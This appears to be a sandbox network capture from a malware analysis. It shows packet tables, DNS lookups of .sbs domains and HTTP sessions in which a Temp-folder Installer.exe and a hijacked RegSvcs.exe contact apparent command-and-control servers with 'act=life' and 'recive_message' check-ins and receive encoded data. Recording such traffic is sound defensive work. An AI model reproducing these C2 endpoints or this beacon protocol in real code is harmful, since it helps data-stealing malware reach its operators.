Nov 22, 2024 05:02:11.040034056 CET	443	49708	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:11.040064096 CET	49708	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:11.040087938 CET	443	49708	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:11.040132046 CET	443	49708	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:11.040133953 CET	49708	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:11.040144920 CET	443	49708	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:11.040198088 CET	49708	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:11.040226936 CET	443	49708	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:11.040290117 CET	49708	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:11.159632921 CET	443	49708	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:11.163815022 CET	443	49708	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:11.163887024 CET	49708	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:11.163961887 CET	443	49708	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:11.172157049 CET	443	49708	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:11.172235966 CET	49708	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:11.172244072 CET	443	49708	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:11.172298908 CET	49708	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:11.172440052 CET	49708	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:11.172440052 CET	49708	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:11.172475100 CET	443	49708	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:11.172497988 CET	443	49708	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:11.196918011 CET	49709	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:11.196997881 CET	443	49709	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:11.197098017 CET	49709	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:11.197360039 CET	49709	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:11.197403908 CET	443	49709	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:12.507210016 CET	443	49709	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:12.507354021 CET	49709	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:12.508754969 CET	49709	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:12.508781910 CET	443	49709	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:12.509141922 CET	443	49709	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:12.510302067 CET	49709	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:12.510437012 CET	49709	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:12.510485888 CET	443	49709	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:13.301561117 CET	443	49709	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:13.301676989 CET	443	49709	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:13.301783085 CET	49709	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:13.302015066 CET	49709	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:13.302054882 CET	443	49709	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:13.318806887 CET	49710	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:13.318852901 CET	443	49710	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:13.318950891 CET	49710	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:13.319256067 CET	49710	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:13.319272995 CET	443	49710	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:14.687444925 CET	443	49710	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:14.687562943 CET	49710	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:14.689857006 CET	49710	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:14.689884901 CET	443	49710	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:14.690232038 CET	443	49710	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:14.692038059 CET	49710	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:14.692231894 CET	49710	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:14.692281961 CET	443	49710	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:14.692373037 CET	49710	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:14.739377022 CET	443	49710	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:15.488168955 CET	443	49710	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:15.488271952 CET	443	49710	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:15.488353968 CET	49710	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:15.488593102 CET	49710	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:15.488636017 CET	443	49710	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:15.584841013 CET	49712	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:15.584901094 CET	443	49712	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:15.584986925 CET	49712	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:15.585376978 CET	49712	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:15.585395098 CET	443	49712	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:16.846071959 CET	443	49712	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:16.846184969 CET	49712	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:16.847538948 CET	49712	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:16.847548962 CET	443	49712	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:16.848050117 CET	443	49712	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:16.849144936 CET	49712	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:16.849263906 CET	49712	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:16.849298000 CET	443	49712	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:16.849404097 CET	49712	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:16.849412918 CET	443	49712	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:17.709589958 CET	443	49712	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:17.709660053 CET	443	49712	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:17.709846020 CET	49712	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:17.709880114 CET	49712	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:17.709896088 CET	443	49712	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:17.856755972 CET	49715	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:17.856842995 CET	443	49715	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:17.856997013 CET	49715	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:17.857362032 CET	49715	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:17.857398033 CET	443	49715	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:19.116422892 CET	443	49715	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:19.116597891 CET	49715	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:19.117868900 CET	49715	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:19.117923975 CET	443	49715	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:19.118180990 CET	443	49715	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:19.119437933 CET	49715	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:19.119606972 CET	49715	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:19.119621038 CET	443	49715	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:19.848876953 CET	443	49715	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:19.848964930 CET	443	49715	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:19.849025011 CET	49715	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:19.849204063 CET	49715	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:19.849224091 CET	443	49715	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:20.177202940 CET	49723	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:20.177237988 CET	443	49723	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:20.177328110 CET	49723	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:20.177642107 CET	49723	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:20.177659988 CET	443	49723	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:21.483227015 CET	443	49723	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:21.483448982 CET	49723	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:21.485146046 CET	49723	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:21.485173941 CET	443	49723	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:21.485523939 CET	443	49723	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:21.487438917 CET	49723	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:21.488341093 CET	49723	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:21.488383055 CET	443	49723	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:21.488498926 CET	49723	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:21.488540888 CET	443	49723	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:21.488672018 CET	49723	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:21.488711119 CET	443	49723	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:21.488842964 CET	49723	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:21.488869905 CET	443	49723	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:21.489006042 CET	49723	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:21.489042997 CET	443	49723	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:21.489248991 CET	49723	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:21.489289999 CET	443	49723	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:21.489300013 CET	49723	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:21.489451885 CET	49723	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:21.489495993 CET	49723	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:21.535326958 CET	443	49723	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:21.535631895 CET	49723	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:21.535701990 CET	49723	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:21.535723925 CET	49723	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:21.579339981 CET	443	49723	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:21.579780102 CET	49723	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:21.579850912 CET	49723	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:21.579906940 CET	49723	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:21.627326012 CET	443	49723	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:21.627700090 CET	49723	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:21.675357103 CET	443	49723	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:21.850239038 CET	443	49723	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:23.792794943 CET	443	49723	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:23.792915106 CET	443	49723	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:23.793080091 CET	49723	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:23.793080091 CET	49723	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:23.797220945 CET	49736	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:23.797264099 CET	443	49736	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:23.797353983 CET	49736	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:23.797632933 CET	49736	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:23.797656059 CET	443	49736	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:24.095524073 CET	49723	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:24.095549107 CET	443	49723	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:25.011199951 CET	443	49736	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:25.011303902 CET	49736	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:25.012542963 CET	49736	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:25.012552023 CET	443	49736	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:25.012878895 CET	443	49736	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:25.024502993 CET	49736	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:25.024523973 CET	49736	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:25.024591923 CET	443	49736	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:25.786241055 CET	443	49736	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:25.786362886 CET	443	49736	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:25.786613941 CET	49736	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:25.786726952 CET	49736	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:25.786773920 CET	443	49736	172.67.206.172	192.168.2.5
Nov 22, 2024 05:02:25.786803961 CET	49736	443	192.168.2.5	172.67.206.172
Nov 22, 2024 05:02:25.786819935 CET	443	49736	172.67.206.172	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2024 05:02:04.324063063 CET	54569	53	192.168.2.5	1.1.1.1
Nov 22, 2024 05:02:04.616609097 CET	53	54569	1.1.1.1	192.168.2.5
Nov 22, 2024 05:02:06.219890118 CET	63123	53	192.168.2.5	1.1.1.1
Nov 22, 2024 05:02:06.448358059 CET	53	63123	1.1.1.1	192.168.2.5
Nov 22, 2024 05:02:06.453677893 CET	49817	53	192.168.2.5	1.1.1.1
Nov 22, 2024 05:02:06.807097912 CET	53	49817	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 22, 2024 05:02:04.324063063 CET	192.168.2.5	1.1.1.1	0x7297	Standard query (0)	joxi.net	A (IP address)	IN (0x0001)	false
Nov 22, 2024 05:02:06.219890118 CET	192.168.2.5	1.1.1.1	0x10e2	Standard query (0)	processhol.sbs	A (IP address)	IN (0x0001)	false
Nov 22, 2024 05:02:06.453677893 CET	192.168.2.5	1.1.1.1	0xf5c2	Standard query (0)	librari-night.sbs	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 22, 2024 05:02:04.616609097 CET	1.1.1.1	192.168.2.5	0x7297	No error (0)	joxi.net		176.9.162.205	A (IP address)	IN (0x0001)	false
Nov 22, 2024 05:02:04.616609097 CET	1.1.1.1	192.168.2.5	0x7297	No error (0)	joxi.net		78.47.21.153	A (IP address)	IN (0x0001)	false
Nov 22, 2024 05:02:06.448358059 CET	1.1.1.1	192.168.2.5	0x10e2	Name error (3)	processhol.sbs	none	none	A (IP address)	IN (0x0001)	false
Nov 22, 2024 05:02:06.807097912 CET	1.1.1.1	192.168.2.5	0xf5c2	No error (0)	librari-night.sbs		172.67.206.172	A (IP address)	IN (0x0001)	false
Nov 22, 2024 05:02:06.807097912 CET	1.1.1.1	192.168.2.5	0xf5c2	No error (0)	librari-night.sbs		104.21.85.146	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

librari-night.sbs

joxi.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	176.9.162.205	80	1352	C:\Users\user\AppData\Local\Temp\main\Installer.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 05:02:04.747885942 CET	285	OUT	GET /4Ak49WQH0GE3Nr.mp3 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: joxi.net Connection: Keep-Alive
Nov 22, 2024 05:02:06.126864910 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/5.4.45 Set-Cookie: js=Kjb%2CqXNGWr6qO8OFFfuytA6GbIwRASKgxwp%2CaVFODg3IF0lCGlL3T5hb1EBsxkeemPHDsfJFog2LUGk4F%2C0iJ0; path=/ Cache-Control: no-cache Date: Fri, 22 Nov 2024 04:02:05 GMT Vary: Accept-Language Vary: Accept-Language Content-Encoding: gzip Data Raw: 33 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 54 cd 6e 13 31 10 be f7 29 cc 5e 36 41 9b 75 5a 5a 09 c8 6e a4 96 22 24 0e c0 a1 1c 50 55 21 77 d7 d9 75 bb 7f b5 9d a6 51 83 04 05 21 10 48 48 f4 c6 1b 70 4b 0b 85 40 9b 20 f1 04 de 57 e0 49 18 7b 93 14 a9 62 23 d9 b1 e7 9b cf 33 e3 f9 ec 5d 5b 7f 78 67 e3 c9 a3 bb 28 96 69 d2 5e f0 66 13 25 61 7b 01 c1 e7 a5 54 12 14 c4 84 0b 2a 7d ab 2b 3b 8d 9b d6 d4 24 99 4c 68 fb 7e 7e c0 d0 9f e7 c7 a8 7c a9 be aa 89 3a 51 63 35 2c 3f 20 f5 ab 7c 0e cb 2f 30 0e d5 05 fc 86 08 ec e7 60 29 5f a8 9f b0 3b 52 e3 f2 8d 9a 94 47 80 3a 45 6a 84 8c f3 85 3a d3 04 a8 7c 05 6e 3f d4 b9 71 06 db 2f 35 d1 8e 67 00 1f 79 b8 3a ba 8a 30 61 d9 2e 8a 39 ed f8 16 ee 90 7d 16 e4 99 0b 83 85 38 4d 7c 4b c4 39 97 41 57 22 bd 6f 21 d9 2f a8 6f b1 94 44 14 1f 34 cc de bf 34 95 8b ec 27 54 c4 94 4a 6b c6 8b 83 30 73 77 20 53 97 77 31 11 50 0b 81 03 21 f0 72 73 d9 85 19 38 aa 58 44 c0 59 21 2b c6 5a a7 9b 05 92 e5 59 8d 39 c2 c9 9d c8 e1 0e 71 d2 fa 21 db b4 ef e5 79 94 d0 d5 8c 24 7d [TRUNCATED] Data Ascii: 339uTn1)^6AuZZn"$PU!wuQ!HHpK@ WI{b#3][xg(i^f%a{T}+;$Lh~~\|:Qc5,? \|/0`)_;RG:Ej:\|n?q/5gy:0a.9}8M\|K9AW"o!/oD44'TJk0sw Sw1P!rs8XDY!+ZY9q!y$}p{ym-_~h6{[uFxMi&Ecx==N$[n),&TkyjSXoI)7[-Q+uARerF;95~VX='cW5^F2)\@FAfc6,-0N\D~:CR@k33'zxz&<RBX[=NYVJZpVdgb5ZQXZ+cuw_oNA`J$k N9oN5hj4R';;E}y:S.TDZ;LP4&V 18\|wKY(0t;!5+{}D?a0\K2'
Nov 22, 2024 05:02:06.126904964 CET	9	IN	Data Raw: 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49707	172.67.206.172	443	1248	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 04:02:08 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: librari-night.sbs
2024-11-22 04:02:08 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-22 04:02:08 UTC	1023	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 04:02:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4basnmdoabkadhci93umbut3a6; expires=Mon, 17-Mar-2025 21:48:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IZ9%2BPJCyo5W3qlMMN9c998f5SBr6mdy9t%2BwBwpcmRsNbqSGqT3mdDTfz5CgFkLxsX7lfnmb7rkiq6rmcGEsVm%2F%2BaxDY2kWJ6L1ah%2Bwr1a%2B6BR877mHl7LHmC8%2Bp9ySwhYJDUbg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6605b25fd24283-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1652&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=908&delivery_rate=1750599&cwnd=243&unsent_bytes=0&cid=54ee9e4d0fd619dc&ts=746&x=0"
2024-11-22 04:02:08 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-11-22 04:02:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49708	172.67.206.172	443	1248	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 04:02:10 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 46 Host: librari-night.sbs
2024-11-22 04:02:10 UTC	46	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 63 39 42 6e 38 2d 2d 74 65 73 74 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=Fc9Bn8--test&j=
2024-11-22 04:02:11 UTC	1017	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 04:02:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ptdk7s3noa5d51mhgj1vrahon1; expires=Mon, 17-Mar-2025 21:48:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ZTWRj%2FtQVNLNlVkwF5Ap6V%2F8DCeQ0Re6BCQ7aHsm20m8txXvqUTI8Qh8MLTPu9BZ0jcN%2Fkcz7FQBjEbBRTqz0NgNbt5pVGnrK95Dr%2FWC57RQME3CxpDC5p9eDc6XlEkCOErHA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6605bf5e37c411-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1603&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=947&delivery_rate=1775075&cwnd=214&unsent_bytes=0&cid=85cbe954ba85d1d8&ts=745&x=0"
2024-11-22 04:02:11 UTC	352	IN	Data Raw: 63 63 35 0d 0a 49 33 32 78 70 42 44 69 74 4b 51 47 32 49 4a 36 32 78 6f 4b 43 44 66 4a 6e 57 75 36 30 48 59 41 36 37 66 46 70 64 6e 52 4a 51 4e 59 58 38 65 47 4b 74 61 59 68 6e 57 39 6f 45 43 76 61 48 39 74 47 2b 76 38 44 35 6a 71 45 47 47 48 78 4b 43 4a 2b 36 64 49 49 52 6b 62 30 4d 68 6a 68 35 69 47 59 36 43 67 51 49 42 68 4b 47 31 5a 36 36 64 4a 33 37 6f 55 59 59 66 56 70 4d 36 32 6f 55 6c 67 53 78 48 57 7a 48 57 42 30 4d 56 71 74 65 63 66 76 6e 74 67 5a 6c 36 6b 39 51 61 59 2f 46 52 6c 6b 5a 58 2f 68 35 53 30 55 57 4a 75 48 4d 4c 50 4d 70 2b 59 33 79 53 39 37 46 6a 68 4f 47 74 74 56 61 58 37 44 39 47 34 48 6d 69 50 31 4b 48 50 71 62 68 44 61 30 73 66 31 63 31 2f 69 4d 54 49 59 4c 4c 73 47 62 52 37 4b 43 51 56 72 4f 64 4a 67 50 4a 48 55 49 72 45 74 74 Data Ascii: cc5I32xpBDitKQG2IJ62xoKCDfJnWu60HYA67fFpdnRJQNYX8eGKtaYhnW9oECvaH9tG+v8D5jqEGGHxKCJ+6dIIRkb0Mhjh5iGY6CgQIBhKG1Z66dJ37oUYYfVpM62oUlgSxHWzHWB0MVqtecfvntgZl6k9QaY/FRlkZX/h5S0UWJuHMLPMp+Y3yS97FjhOGttVaX7D9G4HmiP1KHPqbhDa0sf1c1/iMTIYLLsGbR7KCQVrOdJgPJHUIrEtt
2024-11-22 04:02:11 UTC	1369	IN	Data Raw: 7a 6a 64 62 55 62 4c 48 72 48 61 74 7a 59 57 64 59 71 2f 49 44 31 37 45 55 5a 59 50 66 71 4d 32 2f 76 6b 70 6e 51 52 2b 54 69 44 4b 48 7a 6f 59 38 2b 73 4d 64 71 58 39 6b 66 42 65 52 76 78 61 57 71 31 52 6c 68 5a 58 2f 68 37 4f 32 52 47 4a 4b 45 4e 44 4f 65 5a 4c 57 31 47 4b 33 35 51 71 2f 66 57 5a 67 56 72 6e 31 42 39 36 78 48 57 6d 41 30 4b 44 44 2b 2f 30 48 5a 6c 6c 66 69 34 5a 54 6a 64 33 4b 62 71 33 67 57 4b 59 32 63 53 70 53 70 37 39 52 6d 4c 59 56 5a 6f 6a 52 71 63 6d 2f 76 30 46 76 54 42 44 56 7a 48 4b 48 33 4d 35 73 75 2b 30 54 74 6e 68 74 5a 31 47 74 38 77 6a 64 38 6c 6f 69 6a 73 33 6e 6e 2f 75 64 51 47 4a 54 58 65 62 46 66 49 37 52 30 43 53 6c 72 67 48 35 66 32 51 71 44 65 76 78 44 4e 65 67 46 58 43 4d 32 37 58 4c 76 72 56 4b 59 6b 38 66 31 73 Data Ascii: zjdbUbLHrHatzYWdYq/ID17EUZYPfqM2/vkpnQR+TiDKHzoY8+sMdqX9kfBeRvxaWq1RlhZX/h7O2RGJKENDOeZLW1GK35Qq/fWZgVrn1B96xHWmA0KDD+/0HZllfi4ZTjd3Kbq3gWKY2cSpSp79RmLYVZojRqcm/v0FvTBDVzHKH3M5su+0TtnhtZ1Gt8wjd8loijs3nn/udQGJTXebFfI7R0CSlrgH5f2QqDevxDNegFXCM27XLvrVKYk8f1s
2024-11-22 04:02:11 UTC	1369	IN	Data Raw: 30 43 53 6c 72 67 48 35 66 32 51 71 44 65 76 7a 41 4e 69 35 48 6d 61 4a 30 71 72 43 75 4c 52 45 62 45 59 56 33 63 46 32 6a 4e 2f 4c 59 72 72 6e 48 4c 78 71 62 57 4e 5a 70 37 39 48 6d 4c 55 4d 49 74 47 56 69 4d 43 74 73 47 68 69 55 42 61 54 32 54 79 5a 6c 73 46 6f 2b 72 68 59 76 6e 31 67 59 56 4f 6a 2f 78 76 64 76 42 39 6a 67 39 4f 6d 79 72 65 31 52 32 42 42 47 64 2f 47 64 59 66 45 31 47 47 38 38 68 4c 35 4e 69 68 74 54 65 75 6e 53 65 36 69 41 33 4f 66 6c 35 4c 45 74 62 31 41 64 77 45 41 6e 64 38 79 68 39 71 47 50 50 72 72 47 4c 56 2f 59 47 78 52 6f 2f 41 47 30 61 41 56 62 6f 66 48 6f 4d 65 79 76 55 68 74 53 42 4c 55 79 33 6d 4b 32 38 4a 6a 75 36 42 57 2b 58 39 77 4b 67 33 72 79 52 6e 56 76 6a 70 70 68 64 7a 6e 32 50 57 71 42 32 5a 4e 58 34 75 47 64 6f 7a Data Ascii: 0CSlrgH5f2QqDevzANi5HmaJ0qrCuLREbEYV3cF2jN/LYrrnHLxqbWNZp79HmLUMItGViMCtsGhiUBaT2TyZlsFo+rhYvn1gYVOj/xvdvB9jg9Omyre1R2BBGd/GdYfE1GG88hL5NihtTeunSe6iA3Ofl5LEtb1AdwEAnd8yh9qGPPrrGLV/YGxRo/AG0aAVbofHoMeyvUhtSBLUy3mK28Jju6BW+X9wKg3ryRnVvjpphdzn2PWqB2ZNX4uGdoz
